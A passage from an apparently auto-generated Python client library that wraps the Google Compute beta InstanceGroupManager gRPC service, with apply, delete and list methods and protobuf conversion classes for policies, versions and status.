InstanceGroupManagerVersionsArray.to_proto(self.versions)\n )\n if Primitive.to_proto(self.target_pools):\n request.resource.target_pools.extend(Primitive.to_proto(self.target_pools))\n if Primitive.to_proto(self.base_instance_name):\n request.resource.base_instance_name = Primitive.to_proto(\n self.base_instance_name\n )\n\n if Primitive.to_proto(self.target_size):\n request.resource.target_size = Primitive.to_proto(self.target_size)\n\n if InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n ):\n request.resource.auto_healing_policies.extend(\n InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n )\n )\n if InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy):\n request.resource.update_policy.CopyFrom(\n InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy)\n )\n else:\n request.resource.ClearField(\"update_policy\")\n if InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports):\n request.resource.named_ports.extend(\n InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports)\n )\n if InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy):\n request.resource.stateful_policy.CopyFrom(\n InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy)\n )\n else:\n request.resource.ClearField(\"stateful_policy\")\n if Primitive.to_proto(self.service_account):\n request.resource.service_account = Primitive.to_proto(self.service_account)\n\n if InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action):\n request.resource.failover_action = (\n InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action)\n )\n\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n request.service_account_file = self.service_account_file\n\n response = stub.ApplyComputeBetaInstanceGroupManager(request)\n self.id = Primitive.from_proto(response.id)\n self.creation_timestamp = Primitive.from_proto(response.creation_timestamp)\n self.name = Primitive.from_proto(response.name)\n self.description = Primitive.from_proto(response.description)\n self.zone = Primitive.from_proto(response.zone)\n self.region = Primitive.from_proto(response.region)\n self.distribution_policy = InstanceGroupManagerDistributionPolicy.from_proto(\n response.distribution_policy\n )\n self.instance_template = Primitive.from_proto(response.instance_template)\n self.versions = InstanceGroupManagerVersionsArray.from_proto(response.versions)\n self.instance_group = Primitive.from_proto(response.instance_group)\n self.target_pools = Primitive.from_proto(response.target_pools)\n self.base_instance_name = Primitive.from_proto(response.base_instance_name)\n self.fingerprint = Primitive.from_proto(response.fingerprint)\n self.current_actions = InstanceGroupManagerCurrentActions.from_proto(\n response.current_actions\n )\n self.status = InstanceGroupManagerStatus.from_proto(response.status)\n self.target_size = Primitive.from_proto(response.target_size)\n self.self_link = Primitive.from_proto(response.self_link)\n self.auto_healing_policies = (\n InstanceGroupManagerAutoHealingPoliciesArray.from_proto(\n response.auto_healing_policies\n )\n )\n self.update_policy = InstanceGroupManagerUpdatePolicy.from_proto(\n response.update_policy\n )\n self.named_ports = InstanceGroupManagerNamedPortsArray.from_proto(\n response.named_ports\n )\n self.stateful_policy = InstanceGroupManagerStatefulPolicy.from_proto(\n response.stateful_policy\n )\n self.service_account = Primitive.from_proto(response.service_account)\n self.failover_action = InstanceGroupManagerFailoverActionEnum.from_proto(\n response.failover_action\n )\n self.project = Primitive.from_proto(response.project)\n self.location = Primitive.from_proto(response.location)\n\n def delete(self):\n stub = (\n instance_group_manager_pb2_grpc.ComputeBetaInstanceGroupManagerServiceStub(\n channel.Channel()\n )\n )\n request = (\n instance_group_manager_pb2.DeleteComputeBetaInstanceGroupManagerRequest()\n )\n request.service_account_file = self.service_account_file\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceGroupManagerDistributionPolicy.to_proto(self.distribution_policy):\n request.resource.distribution_policy.CopyFrom(\n InstanceGroupManagerDistributionPolicy.to_proto(\n self.distribution_policy\n )\n )\n else:\n request.resource.ClearField(\"distribution_policy\")\n if Primitive.to_proto(self.instance_template):\n request.resource.instance_template = Primitive.to_proto(\n self.instance_template\n )\n\n if InstanceGroupManagerVersionsArray.to_proto(self.versions):\n request.resource.versions.extend(\n InstanceGroupManagerVersionsArray.to_proto(self.versions)\n )\n if Primitive.to_proto(self.target_pools):\n request.resource.target_pools.extend(Primitive.to_proto(self.target_pools))\n if Primitive.to_proto(self.base_instance_name):\n request.resource.base_instance_name = Primitive.to_proto(\n self.base_instance_name\n )\n\n if Primitive.to_proto(self.target_size):\n request.resource.target_size = Primitive.to_proto(self.target_size)\n\n if InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n ):\n request.resource.auto_healing_policies.extend(\n InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n )\n )\n if InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy):\n request.resource.update_policy.CopyFrom(\n InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy)\n )\n else:\n request.resource.ClearField(\"update_policy\")\n if InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports):\n request.resource.named_ports.extend(\n InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports)\n )\n if InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy):\n request.resource.stateful_policy.CopyFrom(\n InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy)\n )\n else:\n request.resource.ClearField(\"stateful_policy\")\n if Primitive.to_proto(self.service_account):\n request.resource.service_account = Primitive.to_proto(self.service_account)\n\n if InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action):\n request.resource.failover_action = (\n InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action)\n )\n\n if Primitive.to_proto(self.project):\n request.resource.project = Primitive.to_proto(self.project)\n\n if Primitive.to_proto(self.location):\n request.resource.location = Primitive.to_proto(self.location)\n\n response = stub.DeleteComputeBetaInstanceGroupManager(request)\n\n @classmethod\n def list(self, project, location, service_account_file=\"\"):\n stub = (\n instance_group_manager_pb2_grpc.ComputeBetaInstanceGroupManagerServiceStub(\n channel.Channel()\n )\n )\n request = (\n instance_group_manager_pb2.ListComputeBetaInstanceGroupManagerRequest()\n )\n request.service_account_file = service_account_file\n request.Project = project\n\n request.Location = location\n\n return stub.ListComputeBetaInstanceGroupManager(request).items\n\n def to_proto(self):\n resource = instance_group_manager_pb2.ComputeBetaInstanceGroupManager()\n if Primitive.to_proto(self.name):\n resource.name = Primitive.to_proto(self.name)\n if Primitive.to_proto(self.description):\n resource.description = Primitive.to_proto(self.description)\n if InstanceGroupManagerDistributionPolicy.to_proto(self.distribution_policy):\n resource.distribution_policy.CopyFrom(\n InstanceGroupManagerDistributionPolicy.to_proto(\n self.distribution_policy\n )\n )\n else:\n resource.ClearField(\"distribution_policy\")\n if Primitive.to_proto(self.instance_template):\n resource.instance_template = Primitive.to_proto(self.instance_template)\n if InstanceGroupManagerVersionsArray.to_proto(self.versions):\n resource.versions.extend(\n InstanceGroupManagerVersionsArray.to_proto(self.versions)\n )\n if Primitive.to_proto(self.target_pools):\n resource.target_pools.extend(Primitive.to_proto(self.target_pools))\n if Primitive.to_proto(self.base_instance_name):\n resource.base_instance_name = Primitive.to_proto(self.base_instance_name)\n if Primitive.to_proto(self.target_size):\n resource.target_size = Primitive.to_proto(self.target_size)\n if InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n ):\n resource.auto_healing_policies.extend(\n InstanceGroupManagerAutoHealingPoliciesArray.to_proto(\n self.auto_healing_policies\n )\n )\n if InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy):\n resource.update_policy.CopyFrom(\n InstanceGroupManagerUpdatePolicy.to_proto(self.update_policy)\n )\n else:\n resource.ClearField(\"update_policy\")\n if InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports):\n resource.named_ports.extend(\n InstanceGroupManagerNamedPortsArray.to_proto(self.named_ports)\n )\n if InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy):\n resource.stateful_policy.CopyFrom(\n InstanceGroupManagerStatefulPolicy.to_proto(self.stateful_policy)\n )\n else:\n resource.ClearField(\"stateful_policy\")\n if Primitive.to_proto(self.service_account):\n resource.service_account = Primitive.to_proto(self.service_account)\n if InstanceGroupManagerFailoverActionEnum.to_proto(self.failover_action):\n resource.failover_action = InstanceGroupManagerFailoverActionEnum.to_proto(\n self.failover_action\n )\n if Primitive.to_proto(self.project):\n resource.project = Primitive.to_proto(self.project)\n if Primitive.to_proto(self.location):\n resource.location = Primitive.to_proto(self.location)\n return resource\n\n\nclass InstanceGroupManagerDistributionPolicy(object):\n def __init__(self, zones: list = None, target_shape: str = None):\n self.zones = zones\n self.target_shape = target_shape\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicy()\n )\n if InstanceGroupManagerDistributionPolicyZonesArray.to_proto(resource.zones):\n res.zones.extend(\n InstanceGroupManagerDistributionPolicyZonesArray.to_proto(\n resource.zones\n )\n )\n if InstanceGroupManagerDistributionPolicyTargetShapeEnum.to_proto(\n resource.target_shape\n ):\n res.target_shape = (\n InstanceGroupManagerDistributionPolicyTargetShapeEnum.to_proto(\n resource.target_shape\n )\n )\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerDistributionPolicy(\n zones=InstanceGroupManagerDistributionPolicyZonesArray.from_proto(\n resource.zones\n ),\n target_shape=InstanceGroupManagerDistributionPolicyTargetShapeEnum.from_proto(\n resource.target_shape\n ),\n )\n\n\nclass InstanceGroupManagerDistributionPolicyArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerDistributionPolicy.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerDistributionPolicy.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerDistributionPolicyZones(object):\n def __init__(self, zone: str = None):\n self.zone = zone\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerDistributionPolicyZones()\n )\n if Primitive.to_proto(resource.zone):\n res.zone = Primitive.to_proto(resource.zone)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerDistributionPolicyZones(\n zone=Primitive.from_proto(resource.zone),\n )\n\n\nclass InstanceGroupManagerDistributionPolicyZonesArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerDistributionPolicyZones.to_proto(i) for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerDistributionPolicyZones.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerVersions(object):\n def __init__(\n self, name: str = None, instance_template: str = None, target_size: dict = None\n ):\n self.name = name\n self.instance_template = instance_template\n self.target_size = target_size\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerVersions()\n if Primitive.to_proto(resource.name):\n res.name = Primitive.to_proto(resource.name)\n if Primitive.to_proto(resource.instance_template):\n res.instance_template = Primitive.to_proto(resource.instance_template)\n if InstanceGroupManagerVersionsTargetSize.to_proto(resource.target_size):\n res.target_size.CopyFrom(\n InstanceGroupManagerVersionsTargetSize.to_proto(resource.target_size)\n )\n else:\n res.ClearField(\"target_size\")\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerVersions(\n name=Primitive.from_proto(resource.name),\n instance_template=Primitive.from_proto(resource.instance_template),\n target_size=InstanceGroupManagerVersionsTargetSize.from_proto(\n resource.target_size\n ),\n )\n\n\nclass InstanceGroupManagerVersionsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerVersions.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerVersions.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerVersionsTargetSize(object):\n def __init__(self, fixed: int = None, percent: int = None, calculated: int = None):\n self.fixed = fixed\n self.percent = percent\n self.calculated = calculated\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerVersionsTargetSize()\n )\n if Primitive.to_proto(resource.fixed):\n res.fixed = Primitive.to_proto(resource.fixed)\n if Primitive.to_proto(resource.percent):\n res.percent = Primitive.to_proto(resource.percent)\n if Primitive.to_proto(resource.calculated):\n res.calculated = Primitive.to_proto(resource.calculated)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerVersionsTargetSize(\n fixed=Primitive.from_proto(resource.fixed),\n percent=Primitive.from_proto(resource.percent),\n calculated=Primitive.from_proto(resource.calculated),\n )\n\n\nclass InstanceGroupManagerVersionsTargetSizeArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerVersionsTargetSize.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerVersionsTargetSize.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerCurrentActions(object):\n def __init__(\n self,\n none: int = None,\n creating: int = None,\n creating_without_retries: int = None,\n verifying: int = None,\n recreating: int = None,\n deleting: int = None,\n abandoning: int = None,\n restarting: int = None,\n refreshing: int = None,\n ):\n self.none = none\n self.creating = creating\n self.creating_without_retries = creating_without_retries\n self.verifying = verifying\n self.recreating = recreating\n self.deleting = deleting\n self.abandoning = abandoning\n self.restarting = restarting\n self.refreshing = refreshing\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerCurrentActions()\n if Primitive.to_proto(resource.none):\n res.none = Primitive.to_proto(resource.none)\n if Primitive.to_proto(resource.creating):\n res.creating = Primitive.to_proto(resource.creating)\n if Primitive.to_proto(resource.creating_without_retries):\n res.creating_without_retries = Primitive.to_proto(\n resource.creating_without_retries\n )\n if Primitive.to_proto(resource.verifying):\n res.verifying = Primitive.to_proto(resource.verifying)\n if Primitive.to_proto(resource.recreating):\n res.recreating = Primitive.to_proto(resource.recreating)\n if Primitive.to_proto(resource.deleting):\n res.deleting = Primitive.to_proto(resource.deleting)\n if Primitive.to_proto(resource.abandoning):\n res.abandoning = Primitive.to_proto(resource.abandoning)\n if Primitive.to_proto(resource.restarting):\n res.restarting = Primitive.to_proto(resource.restarting)\n if Primitive.to_proto(resource.refreshing):\n res.refreshing = Primitive.to_proto(resource.refreshing)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerCurrentActions(\n none=Primitive.from_proto(resource.none),\n creating=Primitive.from_proto(resource.creating),\n creating_without_retries=Primitive.from_proto(\n resource.creating_without_retries\n ),\n verifying=Primitive.from_proto(resource.verifying),\n recreating=Primitive.from_proto(resource.recreating),\n deleting=Primitive.from_proto(resource.deleting),\n abandoning=Primitive.from_proto(resource.abandoning),\n restarting=Primitive.from_proto(resource.restarting),\n refreshing=Primitive.from_proto(resource.refreshing),\n )\n\n\nclass InstanceGroupManagerCurrentActionsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerCurrentActions.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerCurrentActions.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatus(object):\n def __init__(\n self,\n is_stable: bool = None,\n version_target: dict = None,\n stateful: dict = None,\n autoscaler: str = None,\n ):\n self.is_stable = is_stable\n self.version_target = version_target\n self.stateful = stateful\n self.autoscaler = autoscaler\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatus()\n if Primitive.to_proto(resource.is_stable):\n res.is_stable = Primitive.to_proto(resource.is_stable)\n if InstanceGroupManagerStatusVersionTarget.to_proto(resource.version_target):\n res.version_target.CopyFrom(\n InstanceGroupManagerStatusVersionTarget.to_proto(\n resource.version_target\n )\n )\n else:\n res.ClearField(\"version_target\")\n if InstanceGroupManagerStatusStateful.to_proto(resource.stateful):\n res.stateful.CopyFrom(\n InstanceGroupManagerStatusStateful.to_proto(resource.stateful)\n )\n else:\n res.ClearField(\"stateful\")\n if Primitive.to_proto(resource.autoscaler):\n res.autoscaler = Primitive.to_proto(resource.autoscaler)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatus(\n is_stable=Primitive.from_proto(resource.is_stable),\n version_target=InstanceGroupManagerStatusVersionTarget.from_proto(\n resource.version_target\n ),\n stateful=InstanceGroupManagerStatusStateful.from_proto(resource.stateful),\n autoscaler=Primitive.from_proto(resource.autoscaler),\n )\n\n\nclass InstanceGroupManagerStatusArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatus.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerStatus.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatusVersionTarget(object):\n def __init__(self, is_reached: bool = None):\n self.is_reached = is_reached\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatusVersionTarget()\n )\n if Primitive.to_proto(resource.is_reached):\n res.is_reached = Primitive.to_proto(resource.is_reached)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatusVersionTarget(\n is_reached=Primitive.from_proto(resource.is_reached),\n )\n\n\nclass InstanceGroupManagerStatusVersionTargetArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatusVersionTarget.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatusVersionTarget.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerStatusStateful(object):\n def __init__(\n self,\n has_stateful_config: bool = None,\n per_instance_configs: dict = None,\n is_stateful: bool = None,\n ):\n self.has_stateful_config = has_stateful_config\n self.per_instance_configs = per_instance_configs\n self.is_stateful = is_stateful\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatusStateful()\n if Primitive.to_proto(resource.has_stateful_config):\n res.has_stateful_config = Primitive.to_proto(resource.has_stateful_config)\n if InstanceGroupManagerStatusStatefulPerInstanceConfigs.to_proto(\n resource.per_instance_configs\n ):\n res.per_instance_configs.CopyFrom(\n InstanceGroupManagerStatusStatefulPerInstanceConfigs.to_proto(\n resource.per_instance_configs\n )\n )\n else:\n res.ClearField(\"per_instance_configs\")\n if Primitive.to_proto(resource.is_stateful):\n res.is_stateful = Primitive.to_proto(resource.is_stateful)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatusStateful(\n has_stateful_config=Primitive.from_proto(resource.has_stateful_config),\n per_instance_configs=InstanceGroupManagerStatusStatefulPerInstanceConfigs.from_proto(\n resource.per_instance_configs\n ),\n is_stateful=Primitive.from_proto(resource.is_stateful),\n )\n\n\nclass InstanceGroupManagerStatusStatefulArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerStatusStateful.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerStatusStateful.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatusStatefulPerInstanceConfigs(object):\n def __init__(self, all_effective: bool = None):\n self.all_effective = all_effective\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatusStatefulPerInstanceConfigs()\n )\n if Primitive.to_proto(resource.all_effective):\n res.all_effective = Primitive.to_proto(resource.all_effective)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerStatusStatefulPerInstanceConfigs(\n all_effective=Primitive.from_proto(resource.all_effective),\n )\n\n\nclass InstanceGroupManagerStatusStatefulPerInstanceConfigsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerStatusStatefulPerInstanceConfigs.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerStatusStatefulPerInstanceConfigs.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerAutoHealingPolicies(object):\n def __init__(self, health_check: str = None, initial_delay_sec: int = None):\n self.health_check = health_check\n self.initial_delay_sec = initial_delay_sec\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerAutoHealingPolicies()\n )\n if Primitive.to_proto(resource.health_check):\n res.health_check = Primitive.to_proto(resource.health_check)\n if Primitive.to_proto(resource.initial_delay_sec):\n res.initial_delay_sec = Primitive.to_proto(resource.initial_delay_sec)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerAutoHealingPolicies(\n health_check=Primitive.from_proto(resource.health_check),\n initial_delay_sec=Primitive.from_proto(resource.initial_delay_sec),\n )\n\n\nclass InstanceGroupManagerAutoHealingPoliciesArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerAutoHealingPolicies.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerAutoHealingPolicies.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerUpdatePolicy(object):\n def __init__(\n self,\n type: str = None,\n instance_redistribution_type: str = None,\n minimal_action: str = None,\n max_surge: dict = None,\n max_unavailable: dict = None,\n replacement_method: str = None,\n most_disruptive_allowed_action: str = None,\n min_ready_sec: int = None,\n ):\n self.type = type\n self.instance_redistribution_type = instance_redistribution_type\n self.minimal_action = minimal_action\n self.max_surge = max_surge\n self.max_unavailable = max_unavailable\n self.replacement_method = replacement_method\n self.most_disruptive_allowed_action = most_disruptive_allowed_action\n self.min_ready_sec = min_ready_sec\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicy()\n if InstanceGroupManagerUpdatePolicyTypeEnum.to_proto(resource.type):\n res.type = InstanceGroupManagerUpdatePolicyTypeEnum.to_proto(resource.type)\n if InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.to_proto(\n resource.instance_redistribution_type\n ):\n res.instance_redistribution_type = (\n InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.to_proto(\n resource.instance_redistribution_type\n )\n )\n if InstanceGroupManagerUpdatePolicyMinimalActionEnum.to_proto(\n resource.minimal_action\n ):\n res.minimal_action = (\n InstanceGroupManagerUpdatePolicyMinimalActionEnum.to_proto(\n resource.minimal_action\n )\n )\n if InstanceGroupManagerUpdatePolicyMaxSurge.to_proto(resource.max_surge):\n res.max_surge.CopyFrom(\n InstanceGroupManagerUpdatePolicyMaxSurge.to_proto(resource.max_surge)\n )\n else:\n res.ClearField(\"max_surge\")\n if InstanceGroupManagerUpdatePolicyMaxUnavailable.to_proto(\n resource.max_unavailable\n ):\n res.max_unavailable.CopyFrom(\n InstanceGroupManagerUpdatePolicyMaxUnavailable.to_proto(\n resource.max_unavailable\n )\n )\n else:\n res.ClearField(\"max_unavailable\")\n if InstanceGroupManagerUpdatePolicyReplacementMethodEnum.to_proto(\n resource.replacement_method\n ):\n res.replacement_method = (\n InstanceGroupManagerUpdatePolicyReplacementMethodEnum.to_proto(\n resource.replacement_method\n )\n )\n if InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.to_proto(\n resource.most_disruptive_allowed_action\n ):\n res.most_disruptive_allowed_action = InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.to_proto(\n resource.most_disruptive_allowed_action\n )\n if Primitive.to_proto(resource.min_ready_sec):\n res.min_ready_sec = Primitive.to_proto(resource.min_ready_sec)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerUpdatePolicy(\n type=InstanceGroupManagerUpdatePolicyTypeEnum.from_proto(resource.type),\n instance_redistribution_type=InstanceGroupManagerUpdatePolicyInstanceRedistributionTypeEnum.from_proto(\n resource.instance_redistribution_type\n ),\n minimal_action=InstanceGroupManagerUpdatePolicyMinimalActionEnum.from_proto(\n resource.minimal_action\n ),\n max_surge=InstanceGroupManagerUpdatePolicyMaxSurge.from_proto(\n resource.max_surge\n ),\n max_unavailable=InstanceGroupManagerUpdatePolicyMaxUnavailable.from_proto(\n resource.max_unavailable\n ),\n replacement_method=InstanceGroupManagerUpdatePolicyReplacementMethodEnum.from_proto(\n resource.replacement_method\n ),\n most_disruptive_allowed_action=InstanceGroupManagerUpdatePolicyMostDisruptiveAllowedActionEnum.from_proto(\n resource.most_disruptive_allowed_action\n ),\n min_ready_sec=Primitive.from_proto(resource.min_ready_sec),\n )\n\n\nclass InstanceGroupManagerUpdatePolicyArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerUpdatePolicy.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerUpdatePolicy.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerUpdatePolicyMaxSurge(object):\n def __init__(self, fixed: int = None, percent: int = None, calculated: int = None):\n self.fixed = fixed\n self.percent = percent\n self.calculated = calculated\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMaxSurge()\n )\n if Primitive.to_proto(resource.fixed):\n res.fixed = Primitive.to_proto(resource.fixed)\n if Primitive.to_proto(resource.percent):\n res.percent = Primitive.to_proto(resource.percent)\n if Primitive.to_proto(resource.calculated):\n res.calculated = Primitive.to_proto(resource.calculated)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerUpdatePolicyMaxSurge(\n fixed=Primitive.from_proto(resource.fixed),\n percent=Primitive.from_proto(resource.percent),\n calculated=Primitive.from_proto(resource.calculated),\n )\n\n\nclass InstanceGroupManagerUpdatePolicyMaxSurgeArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerUpdatePolicyMaxSurge.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerUpdatePolicyMaxSurge.from_proto(i) for i in resources\n ]\n\n\nclass InstanceGroupManagerUpdatePolicyMaxUnavailable(object):\n def __init__(self, fixed: int = None, percent: int = None, calculated: int = None):\n self.fixed = fixed\n self.percent = percent\n self.calculated = calculated\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = (\n instance_group_manager_pb2.ComputeBetaInstanceGroupManagerUpdatePolicyMaxUnavailable()\n )\n if Primitive.to_proto(resource.fixed):\n res.fixed = Primitive.to_proto(resource.fixed)\n if Primitive.to_proto(resource.percent):\n res.percent = Primitive.to_proto(resource.percent)\n if Primitive.to_proto(resource.calculated):\n res.calculated = Primitive.to_proto(resource.calculated)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerUpdatePolicyMaxUnavailable(\n fixed=Primitive.from_proto(resource.fixed),\n percent=Primitive.from_proto(resource.percent),\n calculated=Primitive.from_proto(resource.calculated),\n )\n\n\nclass InstanceGroupManagerUpdatePolicyMaxUnavailableArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [\n InstanceGroupManagerUpdatePolicyMaxUnavailable.to_proto(i)\n for i in resources\n ]\n\n @classmethod\n def from_proto(self, resources):\n return [\n InstanceGroupManagerUpdatePolicyMaxUnavailable.from_proto(i)\n for i in resources\n ]\n\n\nclass InstanceGroupManagerNamedPorts(object):\n def __init__(self, name: str = None, port: int = None):\n self.name = name\n self.port = port\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerNamedPorts()\n if Primitive.to_proto(resource.name):\n res.name = Primitive.to_proto(resource.name)\n if Primitive.to_proto(resource.port):\n res.port = Primitive.to_proto(resource.port)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceGroupManagerNamedPorts(\n name=Primitive.from_proto(resource.name),\n port=Primitive.from_proto(resource.port),\n )\n\n\nclass InstanceGroupManagerNamedPortsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceGroupManagerNamedPorts.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceGroupManagerNamedPorts.from_proto(i) for i in resources]\n\n\nclass InstanceGroupManagerStatefulPolicy(object):\n def __init__(self, preserved_state: dict = None):\n self.preserved_state = preserved_state\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_group_manager_pb2.ComputeBetaInstanceGroupManagerStatefulPolicy()\n if InstanceGroupManagerStatefulPolicyPreservedState.to_proto(\n resource.preserved_state\n ):\n res.preserved_state.CopyFrom(\n InstanceGroupManagerStatefulPolicyPreservedState.to_proto(\n resource.preserved_state\n )\n )\n else:\n 